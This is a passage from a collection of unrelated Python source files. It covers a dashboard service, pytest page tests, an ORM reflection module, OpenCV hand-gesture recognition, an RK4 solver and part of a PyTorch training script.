\")\n\n self.loading = False\n\n def createSpecFromData(self):\n\n if self.board.config:\n tic = time.clock()\n specification = self.board.config\n with open(r'specYamlFile/temp/dashboard_{}.yml'.format(self._session), 'w') as file:\n yaml.dump(specification, file)\n toc = time.clock()\n print(f\"Time to create yaml {file.name} : {toc - tic}\")\n return file\n else:\n specification = self.createFakeYaml()\n with open(r'specYamlFile/dashboard_fake_{}.yml'.format(self._session), 'w') as file:\n yaml.dump(specification.__dict__, file)\n return file\n\n def createFakeYaml(self):\n path = BASE_DIR + '/vizApps/services/intake/'\n config = {'title': \"Nouveau DashBoard\", 'layout': \"grid\", 'ncols': 2, 'template': 'material',\n 'theme': 'dark'}\n targets = [\n {\n 'title': 'Nouvelle Source',\n \"source\": {'type': 'intake',\n 'filename': os.path.join(path, 'catalog.yml')},\n 'views': [\n ],\n 'filters': [\n ]\n },\n ]\n specObj = SpecYamlCreator(config=config, targets=targets)\n return specObj\n\n @param.depends('specfile', watch=True)\n def uploadSpecFile(self):\n if self.specfile:\n with open(r'specYamlFile/upload/dashboard_{}.yml'.format(self._session), 'w') as file:\n spec = yaml.load(self.specfile)\n for i in [v for source, v in spec.get('sources').items() if\n v.get('type') == 'json']:\n i['kwargs']['cookies'] = self.josso_session_cookies\n break # no need to iterate further\n yaml.dump(spec, file)\n self.specDoc = file\n self.dashBoard = None\n\n\n\n def updateConfig(self):\n print(f\"call updateConfig; dashboard {self.dashBoard}\")\n\n if self.specDoc.name is not None:\n with open(self.specDoc.name, 'r') as f:\n _yaml = yaml.load(f.read())\n _yaml['config'] = self.configMapping()\n\n with open(r'specYamlFile/temp/new_dashboard_{}.yml'.format(self._session), 'w') as f:\n yaml.dump(_yaml,f)\n self.specDoc = f\n\n def configMapping(self):\n config = {\n 'title': self.config.title,\n 'layout': self.config.layout.name,\n 'ncols': self.config.ncols,\n 'template': self.config.template.name,\n 'theme': self.config.theme.name\n }\n return config\n\n @param.depends('config')\n def panel(self):\n layout = pn.Card(\n sizing_mode = 'stretch_width',\n title = \"Parametres\",\n collapsed = True)\n layout.append(\n pn.Param(\n self.param,\n\n widgets={\n # 'logo': pn.widgets.FileInput(accept='.jpg,.png,.ico,.gif',name=\"Logo\"),\n 'specfile': pn.widgets.FileInput(accept='.yaml,.yml', name=\"Specification File\")},\n show_name=False,\n expand_button=False,\n expand=False,\n sizing_mode=\"stretch_width\"\n ),\n\n )\n if self.config:\n layout.append(pn.Param(\n self.config.param,\n show_name=False,\n expand_button=False,\n expand=False,\n sizing_mode=\"stretch_width\",\n ))\n return layout\n\n @param.depends('dashBoard')\n def main(self):\n print(f\"call main; dashboard {self.dashBoard}, sentinel {self.sentinelHackCounter}\")\n if isinstance(self.dashBoard, Dashboard):\n self.config = self.dashBoard.config\n layout = pn.Column(\n self.dashBoard._main,\n sizing_mode = 'stretch_both',\n margin = 10,\n width_policy = 'max',\n height_policy = 'max'\n\n )\n return layout\n elif self.dashBoard:\n return self.dashBoard\n else:\n return self.indicator\n\n @param.depends('dashBoard')\n def header(self):\n if isinstance(self.dashBoard, Dashboard):\n header= self.dashBoard._header\n return header\n\n @param.depends('dashBoard')\n def sidebar(self):\n if isinstance(self.dashBoard, Dashboard):\n sidebar= self.dashBoard._sidebar\n return sidebar\n\n @param.depends('dashBoard')\n def modal(self):\n if isinstance(self.dashBoard, Dashboard):\n modal= self.dashBoard._modal\n return modal\n\n @param.depends('dashBoard')\n def busyIndicator(self):\n spinner = pn.indicators.LoadingSpinner(width=40, height=40)\n pn.state.sync_busy(spinner)\n bi = pn.Row(spinner)\n return bi\n\n","sub_path":"vizApps/services/lumen/lumenService.py","file_name":"lumenService.py","file_ext":"py","file_size_in_byte":8169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483538501","text":"import time\nimport pytest\nfrom pages.login_page import LoginPage\nfrom pages.product_page import ProductPage\n\n\nclass TestProductPage:\n\n @pytest.mark.parametrize('promo_offer',\n [\"offer0\", \"offer1\", \"offer2\", \"offer3\", \"offer4\", \"offer5\", \"offer6\",\n pytest.param(\"offer7\", marks=pytest.mark.xfail), \"offer8\",\n \"offer9\"])\n def test_guest_can_add_product_to_basket(self, browser, promo_offer):\n # Данные\n link = f\"coders-at-work_207/?promo={promo_offer}\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n product = page.get_product_name_and_price()\n\n # Действия\n page.add_to_basket()\n\n # Проверка\n page.should_be_added_to_basket(product.get('product_name'))\n page.should_be_product_price(product.get('product_price'))\n\n @pytest.mark.xfail(reason=\"invalid test case\")\n def test_guest_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n page.add_to_basket()\n\n # Проверка\n page.should_not_be_success_message()\n\n def test_guest_cant_see_success_message(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_not_be_success_message()\n\n @pytest.mark.xfail(reason=\"invalid test case\")\n def test_message_disappeared_after_adding_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Действия\n page.add_to_basket()\n\n # Проверка\n page.should_be_disappeared()\n\n def test_guest_should_see_login_link_on_product_page(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_be_login_link()\n\n def test_guest_can_go_to_login_page_from_product_page(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Действия\n page.go_to_login_page()\n\n # Проверка\n login_page = LoginPage(browser)\n login_page.should_be_login_page()\n\n\n@pytest.mark.user_basket\nclass TestUserAddToBasketFromProductPage():\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n # Данные\n page = LoginPage(browser)\n\n # Подготовка\n page.open()\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n\n # Действия\n page.register_new_user(email, password)\n\n # Проверка\n page.should_be_authorized_user()\n\n @pytest.mark.need_review\n def test_user_can_add_product_to_basket(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n product = page.get_product_name_and_price()\n\n # Действия\n page.add_to_basket_without_calc()\n\n # Проверка\n page.should_be_added_to_basket(product.get('product_name'))\n page.should_be_product_price(product.get('product_price'))\n\n def test_user_cant_see_success_message(self, browser):\n # Данные\n link = \"coders-at-work_207/\"\n page = ProductPage(browser, link)\n\n # Подготовка\n page.open()\n\n # Проверка\n page.should_not_be_success_message()\n","sub_path":"module_5/test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216616247","text":"from django.utils.translation import ugettext_lazy as _\n\nACTIVE_PROBLEMS = 13\n\nSUBMITTED_FILE_EXTENSION = '.submit'\nSUBMITTED_CUSTOM_INPUT_FILE_EXTENSION = '.custom'\nSUBMITTED_LANG_FILE_EXTENSION = '.langs'\nTESTING_PROTOCOL_EXTENSION = '.protocol'\nTESTING_RAW_EXTENSION = '.raw'\n\nDEFAULT_VAR = {\n 'INT_VECTORS': '[1, 2, 3]',\n 'FLOAT_VECTORS': '[0.42, 0.47]',\n 'INTS': '0',\n 'FLOATS': '0.0',\n 'STRS': '\"\"',\n 'STR_VECTORS': '[\"ahojte\", \"vsetci\"]',\n}\n\nclass JudgeTestResult(object):\n \"\"\"\n Groups all common values of test results in protocol.\n Stores verbose versions of results.\n \"\"\"\n OK = 'OK'\n WRONG_ANSWER = 'WA'\n TIME_LIMIT_EXCEEDED = 'TLE'\n RUNTIME_EXCEPTION = 'EXC'\n SECURITY_EXCEPTION = 'SEC'\n IGNORED = 'IGN'\n COMPILATION_ERROR = 'CERR'\n DONE = 'DONE'\n\n VERBOSE_RESULT = {\n OK: _('OK'),\n WRONG_ANSWER: _('Wrong answer'),\n TIME_LIMIT_EXCEEDED: _('Time limit exceeded'),\n RUNTIME_EXCEPTION: _('Runtime exception'),\n SECURITY_EXCEPTION: _('Security exception'),\n IGNORED: _('Ignored'),\n COMPILATION_ERROR: _('Compilation error'),\n DONE: _('Done'),\n }\n\n @classmethod\n def verbose(cls, result):\n return cls.VERBOSE_RESULT.get(result, result)\n\n\nclass ReviewResponse(JudgeTestResult):\n \"\"\"\n Groups all common values of Review.short_response.\n Stores verbose versions of responses.\n \"\"\"\n\n SENDING_TO_JUDGE = 'Sending to judge'\n SENT_TO_JUDGE = 'Sent to judge'\n JUDGE_UNAVAILABLE = 'Judge unavailable'\n PROTOCOL_CORRUPTED = 'Protocol corrupted'\n REVIEWED = 'Reviewed'\n\n VERBOSE_RESPONSE = {\n # strings are as literals here so `manage.py makemessages` will include them into django.po file\n SENDING_TO_JUDGE: _('Sending to judge'),\n SENT_TO_JUDGE: _('Sent to judge'),\n JUDGE_UNAVAILABLE: _('Judge unavailable'),\n PROTOCOL_CORRUPTED: _('Protocol corrupted'),\n REVIEWED: _('Reviewed'),\n }\n\n @classmethod\n def verbose(cls, response):\n if response in cls.VERBOSE_RESPONSE:\n return cls.VERBOSE_RESPONSE[response]\n return cls.VERBOSE_RESULT.get(response, response)\n\n @classmethod\n def all_items_as_choices(cls):\n judge_responses = list(cls.VERBOSE_RESULT.items())\n communication = [(k, v) for k, v in cls.VERBOSE_RESPONSE.items() if k != ReviewResponse.REVIEWED]\n manual = ((ReviewResponse.REVIEWED, cls.verbose(ReviewResponse.REVIEWED)), )\n\n choices = (\n (_('Manual review'), manual),\n (_('Judge test results'), judge_responses),\n (_('Judge communication'), communication),\n )\n\n return choices\n\nclass Language(object):\n CPP = 1\n PYTHON = 2\n PASCAL = 3\n GO = 4\n PHP = 5\n RUST = 6\n PERL = 7\n R = 8\n LANG_CHOICES = (\n (CPP, 'C++'),\n (PYTHON, 'Python'),\n (PASCAL, 'Pascal'),\n (GO, 'Go'),\n (PHP, 'PHP'),\n (RUST, 'Rust'),\n (PERL, 'Perl'),\n (R, 'R'),\n )\n LANG_LINE_LENGTH = {\n CPP: 60,\n PYTHON: 60,\n PASCAL: 65,\n GO: 60,\n PHP: 60,\n RUST: 60,\n PERL: 60,\n R: 65,\n }\n","sub_path":"editor/submit/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526604392","text":"# Copyright (C) 2019 Greenweaves Software Limited\n\n# This is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with GNU Emacs. If not, see .\n\n# Optimize flow through a branching network, after West et al--\n# A General Model for the Origin of Allometric Scaling Laws in Biology\n# http://hermes.ffn.ub.es/oscar/Biologia/Escala/Science_276_122_1997.pdf\n\nfrom random import random, seed, choice, gauss\nfrom ga import evolve,plot_fitness\nfrom matplotlib.pyplot import plot, show, legend, xlabel, ylabel, ylim, title, figure, savefig\nfrom numpy import mean, std\nfrom math import sqrt\n\ndef create_branching_network(c=10,gamma0=0.1):\n gamma = [gamma0+(1-gamma0)*random() for _ in range(c)]\n n = [choice([2,4,8,16,32]) for _ in range(c)]\n beta = [1/sqrt(n0) for n0 in n]\n return (beta,gamma,n)\n\ndef get_resistance(beta,gamma,n,r_c=1,l_c=1):\n r = r_c\n l = l_c\n R = [] \n for k in range(len(beta),0,-1):\n r /= beta[k-1]\n l /= gamma[k-1]\n R.append(l * r**-4)\n \n Z = 0\n N = 1 \n for k in range(len(beta)):\n Z += R[k]/N\n N *= n[k]\n \n return Z\n\ndef evaluate_branching_network(individual):\n beta, gamma,n = individual\n return 1/get_resistance(beta,gamma,n)\n\ndef mutate_branching_network(individual,probability=0.5,sigma=0.5):\n def perturb(x,sigma=0.1):\n if random() self.length:\n logging.error(self.__msgerror__(value, \"Maximum length('\" + self.length + \") is exceeded!\", instance))\n return value\n\n\nclass TextField(Field):\n\n def check(self, instance, value):\n if value and not isinstance(value, str):\n logging.error(self.__msgtypeerror__(value, 'str', instance))\n return value\n\n\nclass EmailField(Field):\n \n def check(self, instance, value):\n if not isinstance(value, str):\n logging.error(self.__msgtypeerror__(value, 'str', instance))\n elif not re.search(\"^[^@]+@[^@]+\\.[^@]+$\", value):\n logging.error(self.__msgerror__(value, \"is not a valid email!\", instance))\n return value\n\n\nclass EnumField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, values=[]):\n Field.__init__(self, iscomputed, iskey)\n self.values = values\n \n def check(self, instance, value):\n if value and value not in self.values:\n logging.error(self.__msgerror__(value, \" is not a authorized value for enum!\", instance))\n return value\n\n\nclass FloatField(Field):\n\n def __init__(self, iscomputed=False, iskey=False):\n Field.__init__(self, iscomputed, iskey)\n \n def check(self, instance, value):\n if not value is None: #Don't forget if value==0, return false\n try:\n if isinstance(value, str):\n return float(value)\n except ValueError:\n self.__raise_error__( TypeError(instance, float.name, int, value), \"Type Error on field '\" + self.name + \"' for value:\" + value)\n if isinstance(value, Decimal):\n value = float(value)\n elif not isinstance(value, float):\n logging.error(self.__msgtypeerror__(value, 'float', instance))\n return value\n\n\nclass BoolField(Field):\n\n def __init__(self, iscomputed=False, iskey=False):\n Field.__init__(self, iscomputed, iskey)\n \n def check(self, instance, value):\n try:\n if isinstance(value, str):\n return bool(value)\n except ValueError:\n self.__raise_error__( TypeError(instance, self.name, bool, value), \"Type Error on field '\" + self.name + \"' for value:\" + value)\n if value and not isinstance(value, bool):\n logging.error(self.__msgtypeerror__(value, 'bool', instance))\n return value\n\n\nclass DateField(Field):\n\n def check(self, instance, value):\n try:\n if isinstance(value, str):\n return date.fromisoformat(value)\n elif isinstance(value, datetime):\n return datetime.date(value.year, value.month, value.day)\n else:\n if value and not isinstance(value, date):\n logging.error(self.__msgtypeerror__(value, 'date', instance))\n except ValueError:\n logging.error(self.__msgtypeerror__(value, 'date', instance))\n return value\n\n\nclass DateTimeField(Field):\n\n def check(self, instance, value):\n if isinstance(value, str):\n try:\n return datetime.fromisoformat(value)\n except ValueError:\n logging.error(self.__msgtypeerror__(value, 'datetime', instance))\n return value\n else:\n if value and not isinstance(value, datetime):\n logging.error(self.__msgtypeerror__(value, 'datetime', instance))\n return value\n\n\nclass ArrayField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, arraytype=None, length=None):\n Field.__init__(self, iscomputed, iskey)\n self.arraytype = arraytype\n self.length = length\n \n def check(self, instance, value):\n if not isinstance(value, list):\n logging.error(self.__msgtypeerror__(value, 'list', instance))\n if not self.arraytype is None:\n for i in value:\n if not isinstance(i, int):\n logging.error(self.__typee(value, self.name, str(self.arraytype)))\n if not self.length is None and len(value) != self.length:\n logging.error(self.__msgerror__(value, \"Invalid number of elements'\" + self.length + \"!\", instance))\n return value\n\n\nclass ManyToOneField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, modelname=None):\n Field.__init__(self, iscomputed, iskey)\n if modelname is None:\n logging.error(self.__msgerror__(None, \"'modelname' attribute must be specified!\"))\n else:\n self.modelname = modelname\n\n\nclass ListField(Field):\n\n def __init__(self, iscomputed=False, iskey=False, modelname=None, select=None):\n if modelname is None or select is None:\n logging.error(self.__msgerror__(None, \"'modelname' and 'select' attributes must be specified!\"))\n Field.__init__(self, iscomputed, iskey)\n self.modelname = modelname\n self.select = select\n self.value = []\n\n def check(self, instance, value):\n if not isinstance(value, list):\n logging.error(self.__msgtypeerror__(value, 'list', instance))\n return value\n\n\nclass ModelObject(object):\n '''\n Parent class for all model object.\n '''\n\n @classmethod\n def get_model_name(cls):\n return cls.__name__\n\n def __init__(self):\n self.haserror = False\n \n def _as_dict(self):\n __dict = {}\n modelclass = ModelDict().get_model_class(self.get_model_name())\n for field in modelclass.get_fields():\n if hasattr(self, field.name):\n __dict[field.name] = getattr(self, field.name)\n return __dict\n\n def __str__(self):\n model = ModelDict().get_model_class(self.get_model_name())\n return model.model_str(self)\n\n def check(self):\n self.haserror = False\n modelclass = ModelDict().get_model_class(self.get_model_name())\n for field in modelclass.get_fields():\n if not isinstance(field, ListField):\n field.check(self, getattr(self, field.name))\n return self.haserror\n \n'''\n M E T A - D I C T I O N A R Y\n -----------------------------\n'''\nclass ModelClass():\n\n def __init__(self, cls_, name, fields, dictfields):\n self.fields = fields\n self.dictfields = dictfields\n self.name = name\n self.klazz = cls_\n self.key_field = None\n ModelDict().add_modelClass(name, self)\n \n def get_fields(self):\n return self.fields;\n\n def get_id(self, record):\n return getattr(record, self.get_key_field().name)\n\n def get_key_field(self):\n for field in self.fields:\n if field.iskey:\n self.key_field = field\n break\n return self.key_field;\n\n def get_field(self, field_name):\n try:\n return self.dictfields[field_name]\n except KeyError:\n raise ValueError(\"No field '\" + field_name + \"' for '\" + self.name + \"'!'\")\n\n def new_instance(self):\n return eval(\"ModelObject()\", { \"ModelObject\": self.klazz})\n\n def head(self, instance, model_name):\n head = model_name + \"(\"\n delim = ''\n for field in self.fields:\n if hasattr(instance, field.name) and field.iskey:\n head += delim + field.name + ': ' + str(getattr(instance, field.name))\n delim = ', '\n head += \")\" \n return head\n \n def model_str(self, instance):\n model_str = self.head(instance, self.name) + \"\\n\"\n for field in self.fields:\n if not field.iskey and not isinstance(field, ListField) and hasattr(instance, field.name):\n attr = getattr(instance, field.name)\n if hasattr(attr, 'get_model_name'):\n attr = self.head(attr, type(attr).__name__)\n model_str += ' ' + field.name + ': ' + str(attr) + '\\n'\n return model_str\n\n def pre_persist(self, record):\n pass\n\n def pre_merge(self, record):\n pass\n\n def pre_remove(self, record):\n pass\n\n\nclass ModelDict(object):\n \"\"\"\n ModelDict is a SINGLETON class containing a dictonary {modek_name, ModelClass}, instance of ModelClass containing needed information on fields \n \"\"\"\n __instance = None\n __models = {}\n\n def __new__(cls):\n if ModelDict.__instance is None:\n ModelDict.__instance = object.__new__(cls)\n return ModelDict.__instance\n \n def add_modelClass(self, name:str, modelClass):\n ModelDict.__models[name] = modelClass\n \n def get_model_class(self, model_name:str):\n '''\n Generally, model class is already present inside dictionary because dictionary are populated during first model class call.\n However, item can be missing e.g. when building ListField because dictionary information are required before instantiation. \n '''\n try:\n return ModelDict.__models[model_name]\n except (KeyError):\n self.__instantiate(model_name)\n return ModelDict.__models[model_name]\n\n def __instantiate(self, name):\n \"\"\"\n Create a class instance from class '{class_name}' from module 'matcho.model.{class_name}'\n \"\"\"\n try:\n module_path = \"matcha.model.\" + name\n mod = importlib.import_module(module_path)\n eval(\"ModelObject()\", { \"ModelObject\": getattr(mod, name)})\n except (ImportError, AttributeError):\n raise ImportError(name)\n\n\n\n'''\n D E C O R A T O R S\n -------------------\n'''\n\n'''\nfunction decorator launch when calling model class for the first time.\n''' \ndef metamodelclass(cls=None):\n\n def wrap(cls):\n fields = []\n dictfield = {}\n \n cls_annotations = cls.__dict__.get('__annotations__', {})\n for name, field in cls_annotations.items():\n if isinstance(field,Field):\n field.name = name\n fields.append(field)\n dictfield[name] = field\n ModelClass(cls, cls.__name__, fields, dictfield)\n return cls\n\n return wrap(cls)\n\n\n'''\nclass Dispatcher is a decorator use on Model Instance in order to assume serialization and deserialization\n''' \nclass _Dispatcher:\n\n def __init__(self, classname_key='__class__'):\n self._key = classname_key\n self._classes = {} # to keep a reference to the classes used\n\n def __call__(self, class_): # decorate a class\n self._classes[class_.__name__] = class_\n return class_\n\n def decoder_hook(self, d):\n classname = d.pop(self._key, None)\n modelclass = ModelDict().get_model_class(classname)\n if classname:\n if modelclass:\n for field in modelclass.get_fields():\n if isinstance(field, DateTimeField):\n dt = d[field.name]\n if dt:\n d[field.name] = datetime.fromisoformat(dt)\n elif isinstance(field, DateField):\n dt = d[field.name]\n if dt:\n d[field.name] = date.fromisoformat(dt)\n obj = self._classes[classname]()\n for name, value in d.items():\n setattr(obj, name, value)\n return obj\n\n def encoder_default(self, obj):\n if isinstance(obj, date) or isinstance(obj, datetime):\n return str(obj)\n d = obj._as_dict()\n d[self._key] = type(obj).__name__\n return d\n\n\ndispatcher = _Dispatcher()","sub_path":"src/matcha/orm/reflection.py","file_name":"reflection.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5821440","text":"#for proper functioning ensure that the background is plain (ideally a wall)\n#try moving hand forward or backward if right gesture is not recognized \n#fit your hand (upto wrist) within the rectangle(ROI) \n\nimport cv2 as cv\nimport numpy as np\nimport math\n\ncap=cv.VideoCapture(0)\n\n\ndef dist(p1,p2):\n return math.sqrt(((p2[0] - p1[0]) ** 2) + ((p2[1] - p1[1]) ** 2))\n\nwhile True:\n \n _,frame=cap.read()\n frame=cv.flip(frame,1)\n #region of interest where gesture are identified\n cv.rectangle(frame,(340,100),(600,300),(0,255,0),0)\n roi=frame[100:300,340:600]\n \n #processing Roi\n roi_blur = cv.GaussianBlur(roi, (15, 15), 0)\n hsv_roi=cv.cvtColor(roi_blur, cv.COLOR_BGR2HSV)\n \n #range of skin color\n su= np.array([180,255,255], dtype=np.uint8)\n sl= np.array([0,60,0], dtype=np.uint8)\n\n #creating a mask which will remove all non skin colored region\n mask = cv.inRange(hsv_roi, sl, su)\n #masking roi with the mask\n res=cv.bitwise_and(roi,roi,mask=mask)\n \n #thresholding to get a grayscale image\n _, res = cv.threshold(res, 25, 255, cv.THRESH_BINARY)\n res=cv.GaussianBlur(res, (5, 5), 0)\n h,s,v1=cv.split(res)\n res=v1\n res=res.astype(np.uint8)\n \n \n #finding and drawing contours \n contour,hierarchy= cv.findContours(res,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)\n max_ct=max(contour, key = lambda x: cv.contourArea(x))\n epsilon = 0.00001*cv.arcLength(max_ct,True)\n c= cv.approxPolyDP(max_ct,epsilon,True)\n cv.drawContours(roi, c, -1, (255, 0, 255), 2)\n \n #finding extreme points of the contour\n l = tuple(c[c[:, :, 0].argmin()][0])\n r = tuple(c[c[:, :, 0].argmax()][0])\n top = tuple(c[c[:, :, 1].argmin()][0])\n \n #centroid of the contour\n M = cv.moments(max_ct)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n cntr=(cx,cy)\n \n #classification of gestures based on dist between points of contour\n font = cv.FONT_HERSHEY_SIMPLEX\n area=cv.contourArea(max_ct)\n cv.putText(frame, 'Gesture : ', (260, 35), font, 1, (255, 0, 0), 1)\n if dist(top,cntr)>110 and dist(l,cntr)<90:\n cv.putText(frame, 'UP', (430, 35), font, 1 ,(255, 255, 0), 2)\n elif dist(top,cntr)<90 and dist(r,cntr)>100:\n cv.putText(frame, 'RIGHT', (430, 35), font, 1, (0, 255, 0), 2)\n elif dist(top,cntr)>110 and dist(l,cntr)>100:\n cv.putText(frame, 'LEFT', (430, 35), font, 1, (255, 0, 255), 2)\n elif dist(top,cntr)<110 and dist(l,cntr)<100 and dist(r,cntr)<90:\n cv.putText(frame, 'DOWN', (430, 35), font, 1, (0, 255, 255), 2)\n\n cv.imshow('res',res) \n cv.imshow('img',frame)\n \n cv.circle(roi, l, 8, (0, 0, 255), -1)\n cv.circle(roi, r, 8, (0, 255, 0), -1)\n cv.circle(roi, top, 8, (255, 0, 0), -1)\n cv.circle(roi, cntr, 8, (0, 255, 255), -1)\n \n \n \n cv.imshow(\"roi\",roi)\n if cv.waitKey(40) == 27: # Esc to quit the video windows\n break\n\ncv.destroyAllWindows()\ncap.release() \n","sub_path":"OpenCV_exercises/Gesture_recognition/hand_gesture_krithik.py","file_name":"hand_gesture_krithik.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"567476634","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef rk4(h,x,deriv,result,k1):\n '''\n y: an (n x dim) array with n the order of the ODE and dim the dimension\n np.array([[y1' y2' y3'],\n [y1 y2 y3]])\n result: a list of all the y arrays\n k1: the first evaluation\n deriv: the evaluation function f(x,y)\n '''\n yn = result[-1] #the last array, which represents the position\n mid_x = x + 0.5 * h\n \n k2 = deriv(mid_x, yn + 0.5 * h * k1)\n k3 = deriv(mid_x, yn + 0.5 * h * k2)\n k4 = deriv(x + h, yn + h* k3)\n result.append(yn + h / 6 * (k1 + 2*k2 + 2*k3 + k4))\n\n\ndef rk4_driver(init_x, final_x, init_y, step_number, deriv):\n '''\n y: an (n x dim) array with n the order of the ODE and dim the dimension\n np.array([[y1' y2' y3'],\n [y1 y2 y3]])\n result: a list of all the y's. [y1,y2,y3...]\n k1: the first evaluation\n deriv: the evaluation function f(x,y)\n '''\n result = [init_y]\n x_list = [init_x]\n h = (final_x - init_x) / step_number\n x = init_x\n for k in range(step_number):\n k1 = deriv(x, result[-1])\n rk4(h, x, deriv, result, k1)\n x += h\n x_list.append(x)\n return result, x_list\n\n\nif (__name__ == \"__main__\"):\n init_x = 0\n final_x = 1\n init_y = np.array([[1,0]])\n step_number = 10\n result, x_list = rk4_driver(init_x, final_x, init_y, step_number, lambda x, y : -np.linalg.norm(y[-1])**3 * y[-1]) \n fig = plt.figure(dpi = 160)\n ax = fig.add_subplot(\"111\")\n print(result)\n #ax.plot(x_list ,[a[0] for a in result])\n #ax.set_yscale('log')\n\n\n\n\n \n ","sub_path":"tutorial03/exercise03_1_Boxi.py","file_name":"exercise03_1_Boxi.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169991940","text":"\r\n# coding: utf-8\r\n\r\n# In[1]:\r\n\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.optim.lr_scheduler as lr_scheduler\r\nimport torch.utils.data as data\r\nimport torchvision.models as models\r\nimport torchvision.transforms as transforms\r\nimport torchvision.datasets as datasets\r\nimport time\r\nimport copy\r\nimport argparse\r\nimport os\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport json\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport matplotlib.image as mpimg\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n# In[2]:\r\n\r\n\r\ndef load_model(checkpoint_path, arch , num_classes=102):\r\n\r\n\r\n\r\n if model_name == \"resnet\":\r\n \"\"\" Resnet18\r\n \"\"\"\r\n model_ft = models.resnet18(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.fc.in_features\r\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"alexnet\":\r\n \"\"\" Alexnet\r\n \"\"\"\r\n model_ft = models.alexnet(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier[6].in_features\r\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"vgg\":\r\n \"\"\" VGG11_bn\r\n \"\"\"\r\n model_ft = models.vgg11_bn(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier[6].in_features\r\n model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"squeezenet\":\r\n \"\"\" Squeezenet\r\n \"\"\"\r\n model_ft = models.squeezenet1_0(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\r\n model_ft.num_classes = num_classes\r\n input_size = 224\r\n\r\n elif model_name == \"densenet\":\r\n \"\"\" Densenet\r\n \"\"\"\r\n model_ft = models.densenet121(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n num_ftrs = model_ft.classifier.in_features\r\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\r\n input_size = 224\r\n\r\n elif model_name == \"inception\":\r\n \"\"\" Inception v3\r\n Be careful, expects (299,299) sized images and has auxiliary output\r\n \"\"\"\r\n model_ft = models.inception_v3(pretrained=\"imagenet\")\r\n set_parameter_requires_grad(model_ft, feature_extract)\r\n # Handle the auxilary net\r\n num_ftrs = model_ft.AuxLogits.fc.in_features\r\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\r\n # Handle the primary net\r\n num_ftrs = model_ft.fc.in_features\r\n model_ft.fc = nn.Linear(num_ftrs,num_classes)\r\n input_size = 299\r\n\r\n else:\r\n print(\"Invalid model name, exiting...\")\r\n exit()\r\n\r\n chpt = torch.load(checkpoint_path)\r\n model.class_to_idx = chpt['class_to_idx']\r\n model.load_state_dict(chpt['state_dict'])\r\n\r\n\r\n return model\r\n\r\n# In[3]:\r\n\r\n\r\ndef train_model(model, epochs, learning_rate, device , image_path):\r\n\r\n\r\n\r\n since =time.time()\r\n criterion = nn.CrossEntropyLoss()\r\n optimizer= optim.SGD(model.parameters(), lr=0.001, momentum = 0.95, weight_decay = 0.01, nesterov =True)\r\n\r\n scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)\r\n best_acc = 0.0\r\n\r\n\r\n\r\n\r\n print('Number of epochs:', epochs)\r\n 